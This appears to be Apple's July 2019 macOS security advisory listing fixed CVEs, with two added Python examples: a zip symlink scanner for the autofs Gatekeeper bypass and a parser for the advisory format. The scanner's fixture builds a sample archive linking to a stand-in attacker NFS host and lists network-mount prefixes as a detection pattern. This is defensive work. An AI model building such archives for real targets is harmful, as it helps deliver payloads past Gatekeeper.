Released July 22, 2019

AppleGraphicsControl

Available for: macOS Mojave 10.14.5

Impact: An application may be able to read restricted memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2019-8693: Arash Tohidi of Solita

autofs

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.5

Impact: Extracting a zip file containing a symbolic link to an endpoint in an NFS mount that is attacker controlled may bypass Gatekeeper

Description: This was addressed with additional checks by Gatekeeper on files mounted through a network share.

CVE-2019-8656: Filippo Cavallarin
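The Gatekeeper bypass above depends on two things the attacker controls: an archive that carries a symbolic link (Archive Utility preserves symlinks when it extracts a zip) and a link target that lands on an attacker-controlled network share which autofs mounts on first access. A cheap pre-extraction check is to list the symlink entries of an archive and flag any whose target is absolute or points into a network automount. The following is an added example, not code from Apple or from the researcher credited above. It assumes the macOS default auto_master layout, where the `-hosts` map is mounted at `/net` (so `/net/<host>/<export>` triggers an NFS mount), and the hostname, paths and archive contents in the sample are constructed for the example.

```python
import io
import stat
import zipfile

# Path prefixes that resolve to network or removable mounts on macOS.
# "/net/" is the autofs -hosts map from the default auto_master (assumption:
# the system uses the stock map); "/Volumes/" and "/Network/" are where
# user-mounted shares and NetInfo/NIS-style network resources appear.
NETWORK_MOUNT_PREFIXES = ("/net/", "/Volumes/", "/Network/")


def build_sample_zip() -> bytes:
    """Constructed sample archive: one benign file plus a symlink entry whose
    target is an export on a (made-up) attacker-controlled NFS host."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("README.txt", "benign file\n")
        info = zipfile.ZipInfo("app_link")
        # Zip stores the Unix mode in the high 16 bits of external_attr;
        # S_IFLNK marks the entry as a symbolic link and the entry's data
        # is the link target, which is how unzip/Archive Utility read it.
        info.external_attr = (stat.S_IFLNK | 0o777) << 16
        info.create_system = 3  # 3 == Unix, so the mode bits are honoured
        zf.writestr(info, "/net/evil.example/share/payload.app")
    return buf.getvalue()


def zip_symlinks(data: bytes):
    """Return [(entry_name, link_target)] for every symlink entry in the zip.
    Python's own extractall() writes targets as plain files and never creates
    links, so this is a scan of the archive, not a side effect of extraction."""
    found = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            mode = info.external_attr >> 16
            if stat.S_ISLNK(mode):
                target = zf.read(info).decode("utf-8", "replace")
                found.append((info.filename, target))
    return found


def classify_target(target: str) -> str:
    """Label a symlink target by how much trust it implies."""
    if target.startswith(NETWORK_MOUNT_PREFIXES):
        return "network-mount"      # the Gatekeeper bypass vector above
    if target.startswith("/"):
        return "absolute"           # escapes the extraction directory
    if ".." in target.split("/"):
        return "parent-traversal"   # may escape depending on depth
    return "relative"


def suspicious_symlinks(data: bytes):
    """Symlink entries that an extractor should refuse or quarantine."""
    return [
        (name, target, label)
        for name, target in zip_symlinks(data)
        if (label := classify_target(target)) != "relative"
    ]


if __name__ == "__main__":
    for name, target, label in suspicious_symlinks(build_sample_zip()):
        print(f"{label:16} {name} -> {target}")
```

Run the scan on an archive before handing it to a tool that honours symlinks; a `network-mount` hit is exactly the pattern this entry describes, and an `absolute` or `parent-traversal` hit is worth refusing regardless of Gatekeeper.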

Bluetooth

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.5

Impact: A remote attacker may be able to cause arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2018-19860

Bluetooth

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.5

Impact: An attacker in a privileged network position may be able to intercept Bluetooth traffic (Key Negotiation of Bluetooth - KNOB)

Description: An input validation issue existed in Bluetooth. This issue was addressed with improved input validation.

CVE-2019-9506: Daniele Antonioli of SUTD, Singapore, Dr. Nils Ole Tippenhauer of CISPA, Germany, and Prof. Kasper Rasmussen of University of Oxford, England

The changes for this issue mitigate CVE-2020-10135.

Entry added August 13, 2019, updated June 25, 2020

Carbon Core

Available for: macOS Mojave 10.14.5

Impact: A remote attacker may be able to cause arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

CVE-2019-8661: Natalie Silvanovich of Google Project Zero

Core Data

Available for: macOS Mojave 10.14.5

Impact: A remote attacker may be able to leak memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8646: Natalie Silvanovich of Google Project Zero

Core Data

Available for: macOS Mojave 10.14.5

Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2019-8660: Samuel Groß and Natalie Silvanovich of Google Project Zero

CUPS

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.5

Impact: An attacker in a privileged network position may be able to execute arbitrary code

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2019-8675: Stephan Zeisberg (github.com/stze) of Security Research Labs (srlabs.de)

CVE-2019-8696: Stephan Zeisberg (github.com/stze) of Security Research Labs (srlabs.de)

Entry added August 14, 2019, updated September 17, 2019

Disk Management

Available for: macOS Mojave 10.14.5

Impact: A malicious application may be able to execute arbitrary code with system privileges

Description: A memory initialization issue was addressed with improved memory handling.

CVE-2019-8539: ccpwd working with Trend Micro's Zero Day Initiative

Entry added September 17, 2019

Disk Management

Available for: macOS Mojave 10.14.5

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8697: ccpwd working with Trend Micro's Zero Day Initiative

FaceTime

Available for: macOS Mojave 10.14.5

Impact: A remote attacker may be able to cause arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

CVE-2019-8648: Tao Huang and Tielei Wang of Team Pangu

Found in Apps

Available for: macOS Mojave 10.14.5

Impact: A remote attacker may be able to leak memory

Description: This issue was addressed with improved checks.

CVE-2019-8663: Natalie Silvanovich of Google Project Zero

Game Center

Available for: macOS Mojave 10.14.5

Impact: A local user may be able to read a persistent account identifier

Description: This issue was addressed with a new entitlement.

CVE-2019-8702: Min (Spark) Zheng and Xiaolong Bai of Alibaba Inc.

Entry added February 24, 2020

Grapher

Available for: macOS Mojave 10.14.5

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8695: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative

Graphics Drivers

Available for: macOS Mojave 10.14.5, macOS High Sierra 10.13.6

Impact: An application may be able to read restricted memory

Description: A validation issue was addressed with improved input sanitization.

CVE-2019-8691: Aleksandr Tarasikov (@astarasikov), Arash Tohidi of Solita, Lilang Wu and Moony Li of Trend Micro's Mobile Security Research Team working with Trend Micro's Zero Day Initiative

CVE-2019-8692: Lilang Wu and Moony Li of Trend Micro Mobile Security Research Team working with Trend Micro's Zero Day Initiative

Entry updated July 25, 2019

Heimdal

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.5

Impact: An issue existed in Samba that may allow attackers to perform unauthorized actions by intercepting communications between services

Description: This issue was addressed with improved checks to prevent unauthorized actions.

CVE-2018-16860: Isaac Boukris and Andrew Bartlett of the Samba Team and Catalyst

IOAcceleratorFamily

Available for: macOS Mojave 10.14.5

Impact: An application may be able to execute arbitrary code with kernel privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8694: Arash Tohidi of Solita

libxslt

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.5

Impact: A remote attacker may be able to view sensitive information

Description: A stack overflow was addressed with improved input validation.

CVE-2019-13118: found by OSS-Fuzz

Quick Look

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.5

Impact: An attacker may be able to trigger a use-after-free in an application deserializing an untrusted NSDictionary

Description: This issue was addressed with improved checks.

CVE-2019-8662: Natalie Silvanovich and Samuel Groß of Google Project Zero

Safari

Available for: macOS Mojave 10.14.5

Impact: Visiting a malicious website may lead to address bar spoofing

Description: An inconsistent user interface issue was addressed with improved state management.

CVE-2019-8670: Tsubasa FUJII (@reinforchu)

Security

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8697: ccpwd working with Trend Micro's Zero Day Initiative

sips

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6

Impact: An application may be able to execute arbitrary code with system privileges

Description: A memory corruption issue was addressed with improved memory handling.

CVE-2019-8701: Simon Huang(@HuangShaomang), Rong Fan(@fanrong1992) and pjf of IceSword Lab of Qihoo 360

Entry added October 8, 2019

Siri

Available for: macOS Mojave 10.14.5

Impact: A remote attacker may be able to leak memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8646: Natalie Silvanovich of Google Project Zero

Time Machine

Available for: macOS Mojave 10.14.5

Impact: The encryption status of a Time Machine backup may be incorrect

Description: An inconsistent user interface issue was addressed with improved state management.

CVE-2019-8667: Roland Kletzing of cyber:con GmbH

UIFoundation

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.5

Impact: Parsing a maliciously crafted office document may lead to an unexpected application termination or arbitrary code execution

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8657: riusksk of VulWar Corp working with Trend Micro's Zero Day Initiative

WebKit

Available for: macOS Mojave 10.14.5

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue existed in the handling of document loads. This issue was addressed with improved state management.

CVE-2019-8690: Sergei Glazunov of Google Project Zero

WebKit

Available for: macOS Mojave 10.14.5

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue existed in the handling of synchronous page loads. This issue was addressed with improved state management.

CVE-2019-8649: Sergei Glazunov of Google Project Zero

WebKit

Available for: macOS Mojave 10.14.5

Impact: Processing maliciously crafted web content may lead to universal cross site scripting

Description: A logic issue was addressed with improved state management.

CVE-2019-8658: akayn working with Trend Micro's Zero Day Initiative

WebKit

Available for: macOS Mojave 10.14.5

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: Multiple memory corruption issues were addressed with improved memory handling.

CVE-2019-8644: G. Geshev working with Trend Micro's Zero Day Initiative

CVE-2019-8666: Zongming Wang (王宗明) and Zhe Jin (金哲) from Chengdu Security Response Center of Qihoo 360 Technology Co. Ltd.

CVE-2019-8669: akayn working with Trend Micro's Zero Day Initiative

CVE-2019-8671: Apple

CVE-2019-8672: Samuel Groß of Google Project Zero

CVE-2019-8673: Soyeon Park and Wen Xu of SSLab at Georgia Tech

CVE-2019-8676: Soyeon Park and Wen Xu of SSLab at Georgia Tech

CVE-2019-8677: Jihui Lu of Tencent KeenLab

CVE-2019-8678: an anonymous researcher, Anthony Lai (@darkfloyd1014) of Knownsec, Ken Wong (@wwkenwong) of VXRL, Jeonghoon Shin (@singi21a) of Theori, Johnny Yu (@straight_blast) of VX Browser Exploitation Group, Chris Chan (@dr4g0nfl4me) of VX Browser Exploitation Group, Phil Mok (@shadyhamsters) of VX Browser Exploitation Group, Alan Ho (@alan_h0) of Knownsec, Byron Wai of VX Browser Exploitation

CVE-2019-8679: Jihui Lu of Tencent KeenLab

CVE-2019-8680: Jihui Lu of Tencent KeenLab

CVE-2019-8681: G. Geshev working with Trend Micro's Zero Day Initiative

CVE-2019-8683: lokihardt of Google Project Zero

CVE-2019-8684: lokihardt of Google Project Zero

CVE-2019-8685: akayn, Dongzhuo Zhao working with ADLab of Venustech, Ken Wong (@wwkenwong) of VXRL, Anthony Lai (@darkfloyd1014) of VXRL, and Eric Lung (@Khlung1) of VXRL

CVE-2019-8686: G. Geshev working with Trend Micro's Zero Day Initiative

CVE-2019-8687: Apple

CVE-2019-8688: Insu Yun of SSLab at Georgia Tech

CVE-2019-8689: lokihardt of Google Project Zero
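Two details of this advisory's format trip up naive ingestion into a vulnerability tracker: the same CVE can appear under more than one component (CVE-2019-8646 is listed under both Core Data and Siri, CVE-2019-8697 under both Disk Management and Security, each with its own "Available for" line), and a free-text note such as "The changes for this issue mitigate CVE-2020-10135." mentions a CVE that is not itself a fixed entry. The parser below is an added example, not Apple's tooling, and its sample input is an excerpt copied from the entries above. It assumes the layout seen on this page: a component name on its own line, followed by "Available for:", "Impact:", "Description:", one or more "CVE-YYYY-NNNN: credit" lines, and optional "Entry added/updated" or "The changes for this issue" notes; the component-heading rule (a line with no colon that is not a note) is a heuristic for that layout.

```python
import re
from collections import defaultdict

# Constructed sample input: three entries copied from the advisory above.
SAMPLE = """Released July 22, 2019

Bluetooth

Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14.5

Impact: An attacker in a privileged network position may be able to intercept Bluetooth traffic (Key Negotiation of Bluetooth - KNOB)

Description: An input validation issue existed in Bluetooth. This issue was addressed with improved input validation.

CVE-2019-9506: Daniele Antonioli of SUTD, Singapore, Dr. Nils Ole Tippenhauer of CISPA, Germany, and Prof. Kasper Rasmussen of University of Oxford, England

The changes for this issue mitigate CVE-2020-10135.

Entry added August 13, 2019, updated June 25, 2020

Core Data

Available for: macOS Mojave 10.14.5

Impact: A remote attacker may be able to leak memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8646: Natalie Silvanovich of Google Project Zero

Siri

Available for: macOS Mojave 10.14.5

Impact: A remote attacker may be able to leak memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2019-8646: Natalie Silvanovich of Google Project Zero
"""

# A fixed-CVE line: the identifier, optionally followed by ": credit".
CVE_LINE = re.compile(r"^(CVE-\d{4}-\d{4,})(?::\s*(.*))?$")
CVE_ANY = re.compile(r"CVE-\d{4}-\d{4,}")


def parse_advisory(text: str):
    """Split advisory text into one record per component entry."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Released "):
            continue
        m = CVE_LINE.match(line)
        if m and cur is not None:
            cur["cves"].append({"id": m.group(1), "credit": (m.group(2) or "").strip()})
        elif line.startswith("Available for:"):
            cur["available_for"] = [v.strip() for v in line.split(":", 1)[1].split(",")]
        elif line.startswith("Impact:"):
            cur["impact"] = line.split(":", 1)[1].strip()
        elif line.startswith("Description:"):
            cur["description"] = line.split(":", 1)[1].strip()
        elif line.startswith("Entry ") or line.startswith("The changes for this issue"):
            cur["notes"].append(line)
            # CVEs named only in a note are related, not fixed, by this entry.
            cur["related_cves"].extend(CVE_ANY.findall(line))
        else:
            # Heuristic (assumption): any other line is a component heading.
            cur = {"component": line, "available_for": [], "impact": "",
                   "description": "", "cves": [], "notes": [], "related_cves": []}
            entries.append(cur)
    return entries


def cves_by_component(entries):
    """Map each fixed CVE to the sorted list of components it is listed under."""
    idx = defaultdict(set)
    for e in entries:
        for c in e["cves"]:
            idx[c["id"]].add(e["component"])
    return {k: sorted(v) for k, v in idx.items()}


def multi_component_cves(entries):
    """CVEs that appear under more than one component; a tracker that keys
    on CVE alone would otherwise keep only one of the 'Available for' lists."""
    return {k: v for k, v in cves_by_component(entries).items() if len(v) > 1}


if __name__ == "__main__":
    parsed = parse_advisory(SAMPLE)
    for cve, comps in multi_component_cves(parsed).items():
        print(cve, "listed under", ", ".join(comps))
```

When loading the full page, key records on (CVE, component) rather than CVE alone, and keep the note-only CVEs (here CVE-2020-10135) in a separate "related" field so they are not reported as fixed by this release.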